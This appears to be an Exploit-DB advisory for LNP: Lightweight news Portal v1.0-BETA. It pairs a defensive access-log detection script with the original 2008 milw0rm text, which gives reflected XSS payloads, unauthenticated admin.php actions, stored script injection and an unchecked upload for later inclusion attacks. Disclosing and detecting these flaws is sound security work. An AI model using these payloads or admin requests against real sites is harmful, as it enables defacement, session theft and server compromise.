Vendor: LNP: Lightweight news Portal
By: sToRm
CVSS: 7.5 (HIGH)
CWE: Cross-Site Scripting, Insecure Administration, Permanent Code Injection, File Upload
Product Name: LNP: Lightweight news Portal
Affected Version From: v1.0-BETA
Affected Version To: v1.0-BETA
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

LNP: Lightweight news Portal v1.0-BETA Multiple Remote Vulnerabilities

LNP: Lightweight news Portal v1.0-BETA contains multiple remotely exploitable vulnerabilities: Cross-Site Scripting, Insecure Administration, Permanent Code Injection, and File Upload. They can be exploited to execute arbitrary code, inject malicious scripts, and upload malicious files.

Mitigation:

The vendor should release a patch to fix these vulnerabilities. In the meantime, users are advised to upgrade to a newer version of the software if available or implement proper input validation and access control measures to mitigate the risk.
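
Because no patch exists, one compensating control is to watch the web server's access log for the request patterns this advisory lists. The script below is an added example, not part of the original advisory or of the LNP code base; it assumes Apache combined-format logs and a hypothetical allowlist of administrator addresses (`admin_ips`), and its sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints, parameters and admin actions as listed in the advisory.
XSS_PARAMS = {"show_photo.php": "photo", "show_potd.php": "potd"}
ADMIN_ACTIONS = {"potd_delete", "potd", "vote_update", "vote", "modifynews"}
MARKUP = re.compile(r"[<>\"']")  # characters that allow breaking out of an attribute
# Apache combined format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(line, admin_ips):
    """Return (client_ip, finding) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1]
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    param = XSS_PARAMS.get(script)
    if param and any(MARKUP.search(v) for v in query.get(param, [])):
        return ip, f"markup in {param} parameter of {script}"
    # Access logs do not show session state, so fall back to the source address
    # (assumption: administrators connect from a known set of addresses).
    action = query.get("A", [""])[0]
    if (script == "admin.php" and action in ADMIN_ACTIONS
            and status == "200" and ip not in admin_ips):
        return ip, f"admin action {action} from non-admin address"
    return None

def scan(lines, admin_ips=frozenset()):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in (classify(l, admin_ips) for l in lines) if hit]

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jun/2008:10:00:01 +0000] "GET /show_photo.php?photo=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Jun/2008:10:00:05 +0000] "GET /show_photo.php?photo=%22%3E%3Cb%3E HTTP/1.1" 200 530',
    '203.0.113.9 - - [20/Jun/2008:10:00:09 +0000] "POST /admin.php?A=vote_update HTTP/1.1" 200 88',
    '192.0.2.10 - - [20/Jun/2008:10:01:00 +0000] "GET /admin.php?A=potd HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG, admin_ips={"192.0.2.10"}):
        print(ip, finding)
```

Only values carried in the query string are visible in an access log, so markup submitted in a POST body (such as the poll question field) needs request-body logging or an application-level check instead.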

Exploit-DB raw data:

  ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


LNP: Lightweight news Portal v1.0-BETA
Multiple Remote Vulnerabilities


Cross-Site Scripting
--------------------

show_photo.php?photo="><script>javascript:alert(document.domain)</script>
show_potd.php?potd="><script>javascript:alert(document.domain)</script>


Insecure Administration
-----------------------

The admin page faces us with a login, but many important functions are allowed 
to be executed without a logged-in session.

admin.php?A=potd_delete
admin.php?A=potd
admin.php?A=vote_update
admin.php?A=vote
admin.php?A=modifynews


Permanent Code Injection
------------------------

admin.php?A=vote

"Current question" field allows for code injection, allowing us to force 
all users browsing the poll to view an XSS or browser exploit. 


File Upload
-----------

admin.php?A=potd

The "picture of the day" manager allows for further images to be 
uploaded, but does not check for image validity. Although a phpshell 
cannot be executed through this method, a source may be uploaded for 
inclusion in further attacks, possibly an LFI somewhere on the server. 

# milw0rm.com [2008-06-20]